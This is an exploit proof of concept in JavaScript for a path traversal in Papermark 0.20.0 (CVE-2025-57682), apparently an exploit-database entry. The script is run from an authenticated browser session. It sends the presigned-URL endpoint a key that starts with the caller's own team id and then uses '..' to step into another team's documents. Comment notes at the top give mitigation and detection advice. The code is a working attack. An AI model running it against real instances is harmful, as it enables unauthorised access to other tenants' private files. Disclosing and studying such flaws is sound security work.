// Exploit Title: Papermark 0.20.0 - Path Traversal (Authenticated)
// Date: 2026-01-28
// Exploit Author: Eui Chul Chung
// Vendor Homepage: https://www.papermark.com/
// Software Link: https://github.com/mfts/papermark
// Version: 0.20.0
// CVE Identifier: CVE-2025-57682

// Proof of concept, run from the browser console of an authenticated session.
//
// What it shows: the object key sent to the presigned-URL endpoint starts with
// the caller's own team id and then uses a `..` segment to step into another
// team's prefix.
// NOTE(review): presumably the endpoint authorises on the leading path segment
// of `key` without normalising it first; confirm against the server code.
//
// Defender notes:
// - Mitigation: canonicalise `key` server-side, reject any `.` or `..` segment,
//   and check team ownership against the canonical key, not the raw string.
// - Detection: look for requests to this endpoint whose JSON `key` contains a
//   `..` path segment.
(async () => {
  // Identifiers of the object to request, supplied interactively.
  const teamId = prompt("Enter team ID");
  const docId = prompt("Enter document ID");
  const fileName = prompt("Enter file name");

  // The first team returned for the current session provides the key prefix.
  const teamsResponse = await fetch("/api/teams", { method: "GET" });
  const teams = await teamsResponse.json();
  const { id } = teams[0];

  // Own-team prefix followed by a parent-directory segment and the other path.
  const requestBody = JSON.stringify({
    key: `${id}/../${teamId}/${docId}/${fileName}`,
  });

  const presignResponse = await fetch(
    `/api/file/s3/get-presigned-get-url-proxy`,
    {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: requestBody,
    },
  );
  const { url } = await presignResponse.json();

  // Navigate to the URL the server returned.
  window.location.assign(url);
})();